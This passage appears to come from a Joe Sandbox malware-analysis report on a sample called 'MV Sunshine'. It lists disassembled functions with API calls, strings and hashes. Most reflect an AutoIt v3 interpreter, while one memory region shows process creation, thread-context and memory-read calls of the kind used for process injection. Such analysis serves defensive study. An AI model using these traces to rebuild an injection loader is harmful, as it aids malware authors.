Part of subcall function 0064432E: __wsplitpath_helper.LIBCMT ref: 0064436E

_wcscpy.LIBCMT ref: 006894D1
_wcscat.LIBCMT ref: 006894E4
__wsplitpath.LIBCMT ref: 00689509
_wcscat.LIBCMT ref: 0068951F
_wcscat.LIBCMT ref: 00689532

Part of subcall function 0068922F: _memmove.LIBCMT ref: 00689268
Part of subcall function 0068922F: _memmove.LIBCMT ref: 00689277

_wcscmp.LIBCMT ref: 00689479

Part of subcall function 006899BE: _wcscmp.LIBCMT ref: 00689AAE
Part of subcall function 006899BE: _wcscmp.LIBCMT ref: 00689AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006896DC
_wcsncpy.LIBCMT ref: 0068974F
DeleteFileW.KERNEL32(?,?), ref: 00689785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0068979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006897AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006897BE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 09267ad5f789189ebe159552521b54a84d42b5eb977da99761c18b8c8f06d217
Instruction ID: 53c90532a11b6d24742a36a6a3f85f7324d7cbf47e8535353ba215f6096f003e
Opcode Fuzzy Hash: 09267ad5f789189ebe159552521b54a84d42b5eb977da99761c18b8c8f06d217
Instruction Fuzzy Hash: BFC131B1D00229AEDF61EF95CC85AEEB7BEEF45300F0441AAF509E7151DB309A848F65

Function 00623015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623074
RegisterClassExW.USER32(00000030), ref: 0062309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
InitCommonControlsEx.COMCTL32(?), ref: 006230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
LoadIconW.USER32(000000A9), ref: 006230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

TaskbarCreated, xrefs: 006230A4
0, xrefs: 00623056
AutoIt v3 GUI, xrefs: 00623090
+, xrefs: 0062305D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: fde4c662ebad99fdb413ee843d8191cd53277fb8c0e8adca846a38aae10abe19
Instruction ID: 1884f0fc51d965ca7a8a3c86e50f7f385a713eca82baf24f82d80944093c2fe7
Opcode Fuzzy Hash: fde4c662ebad99fdb413ee843d8191cd53277fb8c0e8adca846a38aae10abe19
Instruction Fuzzy Hash: A4314BB1941349EFDB409FE4EC84ACEBBF5FB1A310F10552AF540AA2A0D3B65541CF91

Function 00623041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623074
RegisterClassExW.USER32(00000030), ref: 0062309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
InitCommonControlsEx.COMCTL32(?), ref: 006230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
LoadIconW.USER32(000000A9), ref: 006230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

TaskbarCreated, xrefs: 006230A4
0, xrefs: 00623056
AutoIt v3 GUI, xrefs: 00623090
+, xrefs: 0062305D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 27aaa417d191d00a83de9183a3baff59e44b01bffcf209e7502378201e5db50e
Instruction ID: 7402043ce9faee4e5514f4f86e27577a875888014036d50a18888e9828a184e4
Opcode Fuzzy Hash: 27aaa417d191d00a83de9183a3baff59e44b01bffcf209e7502378201e5db50e
Instruction Fuzzy Hash: 9321E8B1911358EFDB00EFD4E888B9EBBF6FB09750F00512AF511AA2A0D7B155448FA1

Function 006271EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00624864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006E62F8,?,006237C0,?), ref: 00624882

Part of subcall function 0064074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006272C5), ref: 00640771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00627308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0065ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0065ED32
RegCloseKey.ADVAPI32(?), ref: 0065ED70
_wcscat.LIBCMT ref: 0065EDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 006272FE
Include, xrefs: 0065ECE8, 0065ED29
\, xrefs: 0065EDEC
\Include\, xrefs: 006272C5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 0200f933c25d7c54230c35a2899fc5487c8ac0cca09e906fb5967a806298c08e
Instruction ID: 06acd003aeaba1c8135ab1f5eb0246bc1b9399898dcaa60aa225ce2a9eeb4533
Opcode Fuzzy Hash: 0200f933c25d7c54230c35a2899fc5487c8ac0cca09e906fb5967a806298c08e
Instruction Fuzzy Hash: B971AF714083519EC754EF65EC818ABBBFAFF59340F40152EF6458B2A0EB309A49CF66

Function 00623633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006236D2
KillTimer.USER32(?,00000001), ref: 006236FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0062371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0062372A
CreatePopupMenu.USER32 ref: 0062373E
PostQuitMessage.USER32(00000000), ref: 0062375F

Strings

TaskbarCreated, xrefs: 00623725
%k, xrefs: 0065D2D1, 0065D31F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%k
API String ID: 129472671-2455537126
Opcode ID: 8401905ff2e7bc075aaa2d0031b0cdde8e01b9decf03584303e1a932ff95af1f
Instruction ID: cfe9f21d3dfe07d9dafade70823c35a81dd24b920c6779368dcaa20f5ac0bbd1
Opcode Fuzzy Hash: 8401905ff2e7bc075aaa2d0031b0cdde8e01b9decf03584303e1a932ff95af1f
Instruction Fuzzy Hash: 43415EB1100A75BBDF206F64FC49BBA375BE711340F000128FA42863E1CB69AE059F7A

Function 00623A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00623A62
LoadCursorW.USER32(00000000,00007F00), ref: 00623A71
LoadIconW.USER32(00000063), ref: 00623A88
LoadIconW.USER32(000000A4), ref: 00623A9A
LoadIconW.USER32(000000A2), ref: 00623AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00623AD2
RegisterClassExW.USER32(?), ref: 00623B28

Part of subcall function 00623041: GetSysColorBrush.USER32(0000000F), ref: 00623074
Part of subcall function 00623041: RegisterClassExW.USER32(00000030), ref: 0062309E
Part of subcall function 00623041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006230AF
Part of subcall function 00623041: InitCommonControlsEx.COMCTL32(?), ref: 006230CC
Part of subcall function 00623041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006230DC
Part of subcall function 00623041: LoadIconW.USER32(000000A9), ref: 006230F2
Part of subcall function 00623041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00623101

Strings

#, xrefs: 00623B0D
0, xrefs: 00623B06
AutoIt v3, xrefs: 00623B17

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 554d19adb8733e9ca8b78ec659e43f9008ca069d126e2855d156023a11012560
Instruction ID: bf3fc0d6dfdfe0d1fbb51f5b6e7d2f4cad0f0794ce00de6790675a4bc4a92c91
Opcode Fuzzy Hash: 554d19adb8733e9ca8b78ec659e43f9008ca069d126e2855d156023a11012560
Instruction Fuzzy Hash: AA217E70D00354AFDB109FA4EC89B9D7FB6FB18751F001129F604AE2E0C3BAA6448F84

Function 00623778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 006238B9
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 006237C0
/ErrorStdOut, xrefs: 0062388F
/AutoIt3OutputDebug, xrefs: 006238A4
/AutoIt3ExecuteScript, xrefs: 006238CE
bn, xrefs: 0065D44E
CMDLINE, xrefs: 00623834
CMDLINERAW, xrefs: 0062380D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bn
API String ID: 1825951767-3767551264
Opcode ID: c5d1f6172930b9e36fff2f74da5d0cfde5449d611ccafb22c9c78bebf2c479af
Instruction ID: 40e9fcdb388054038c20029dbdcd19c7a56e0ab7fd00720b00342222937a432f
Opcode Fuzzy Hash: c5d1f6172930b9e36fff2f74da5d0cfde5449d611ccafb22c9c78bebf2c479af
Instruction Fuzzy Hash: ADA14D71C106799ACB54EBA0EC91AEEB77ABF14300F10042EF512B7291EF345A09CF65

Function 0062F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006403A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006403D3
Part of subcall function 006403A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006403DB
Part of subcall function 006403A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006403E6
Part of subcall function 006403A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006403F1
Part of subcall function 006403A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006403F9
Part of subcall function 006403A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00640401

Part of subcall function 00636259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0062FA90), ref: 006362B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0062FB2D
OleInitialize.OLE32(00000000), ref: 0062FBAA
CloseHandle.KERNEL32(00000000), ref: 006649F2

Strings

%k, xrefs: 0062F8F6, 0062F908, 0062FACE, 0062FBB1
cn, xrefs: 0062F94B
<gn, xrefs: 0062FA90
\dn, xrefs: 0062F957

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <gn$\dn$%k$cn
API String ID: 1986988660-1507471717
Opcode ID: 7996d7bdfed47b884922c221ab3f0457ed09d2403d070d1949e91e8aeab86ca6
Instruction ID: bb3881c844c26755a5e8df7bcc967427e1337f19f702871319b40f72a0bfef4c
Opcode Fuzzy Hash: 7996d7bdfed47b884922c221ab3f0457ed09d2403d070d1949e91e8aeab86ca6
Instruction Fuzzy Hash: EE81ACB09013D0CEC784EF6AE9956557BE7EB78398710A13EB019CF2A1EB3154098F55

Function 00F63060 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F63131
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F63357

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: 8ade8696e5496f9fbe466ea7f1a4345f77d55a7cf24216fc647c07fcd728b481
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: EFA10771E00209EBDB14CFE4C895BEEBBB5FF48314F208159E505BB280D7759A85EBA4

Function 006239E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00623A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623A36
ShowWindow.USER32(00000000,?,?), ref: 00623A4A
ShowWindow.USER32(00000000,?,?), ref: 00623A53

Strings

edit, xrefs: 00623A30
AutoIt v3, xrefs: 00623A0D, 00623A12, 00623A13

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: af7e43a1f191a44ef4ea907605917b9b888a80523f46d53cebb713ec4b52fd36
Instruction ID: 3e5530b9a58fc66026365aa8075b7892a3f84c26d67ef5cefb9fe0f720f6ba7b
Opcode Fuzzy Hash: af7e43a1f191a44ef4ea907605917b9b888a80523f46d53cebb713ec4b52fd36
Instruction Fuzzy Hash: 62F030706003D07EEB301753AC88E773E7FD7D7FA0B001029BA00A61B0C1A51840CEB1

Function 00F62E40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F62D30: Sleep.KERNELBASE(000001F4), ref: 00F62D41

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F62F58

Strings

75V0GJNTT61HXVCMPZCWGRR28, xrefs: 00F62FBB, 00F62FBE

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: CreateFileSleep
String ID: 75V0GJNTT61HXVCMPZCWGRR28
API String ID: 2694422964-477118028
Opcode ID: b640be68e434fd674769c77948f14e18de96614a787ac0dac8c3fcf900e2b0ff
Instruction ID: 521ff6d0925d5729867f0f822ef17d66860dfb17a1ee0784522f52a530be5136
Opcode Fuzzy Hash: b640be68e434fd674769c77948f14e18de96614a787ac0dac8c3fcf900e2b0ff
Instruction Fuzzy Hash: 4251A131D04289EAEF11D7E4C855BEFBBB8AF19304F044199E6087B2C1C7B90B48DBA5

Function 0064564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 006456AB
_memcpy_s.LIBCMT ref: 0064571D
__read_nolock.LIBCMT ref: 0064577B
__filbuf.LIBCMT ref: 0064579E
_memset.LIBCMT ref: 006457E2

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 796443faea8dc5d7818a43a0fb82a5020b810ca70a887d30a1c7e4ea766f8c87
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 1F519030A01B05DBDB249FA9C8806AE77A7AF41320F258739F826962E2D7709D558B44

Function 006269CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00624F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006E62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624F6F

_free.LIBCMT ref: 0065E68C
_free.LIBCMT ref: 0065E6D3

Part of subcall function 00626BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00626D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0065E462
Bad directive syntax error, xrefs: 0065E6BB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 1a07d7e64c6fe6922ad7f1f0da3fd6086f14fe32c54e269906965d7d346af8ce
Instruction ID: a5b78750d539d481067f99023741edb735c9470233f4bf9ab122b054ded4dd97
Opcode Fuzzy Hash: 1a07d7e64c6fe6922ad7f1f0da3fd6086f14fe32c54e269906965d7d346af8ce
Instruction Fuzzy Hash: A0919F719106299FCF48EFA4D8919EDB7B6FF15300F14442EF815AB291EB319A09CF64

Function 006235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006235A1,SwapMouseButtons,00000004,?), ref: 006235D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006235A1,SwapMouseButtons,00000004,?,?,?,?,00622754), ref: 006235F5
RegCloseKey.KERNELBASE(00000000,?,?,006235A1,SwapMouseButtons,00000004,?,?,?,?,00622754), ref: 00623617

Strings

Control Panel\Mouse, xrefs: 006235D2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fc5f1fcb132bca16bad12ac881556eb961d392402bf4d1f4ba9d32e19fa31037
Instruction ID: 4b2f9c9a7873933a64a06338a8652e5240d6d838875a4134420fa81ebffb05ff
Opcode Fuzzy Hash: fc5f1fcb132bca16bad12ac881556eb961d392402bf4d1f4ba9d32e19fa31037
Instruction Fuzzy Hash: CC114871610628BFDB209FA4EC40AEEB7BEEF05740F015469E805D7310E371AE409B60

Function 00F61D30 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F624EB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F62581
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F625A3

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
Instruction ID: da81261b6eb02d3a94609544e6bddf68e7400fd0ebd50347dd95c8abe2913291
Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
Instruction Fuzzy Hash: B062FB30E146589BEB24CFA4CC51BDEB372EF58300F1091A9D10DEB290E77A9E81DB59

Function 006897E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00625045: _fseek.LIBCMT ref: 0062505D

Part of subcall function 006899BE: _wcscmp.LIBCMT ref: 00689AAE
Part of subcall function 006899BE: _wcscmp.LIBCMT ref: 00689AC1

_free.LIBCMT ref: 0068992C
_free.LIBCMT ref: 00689933
_free.LIBCMT ref: 0068999E

Part of subcall function 00642F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00649C64), ref: 00642FA9
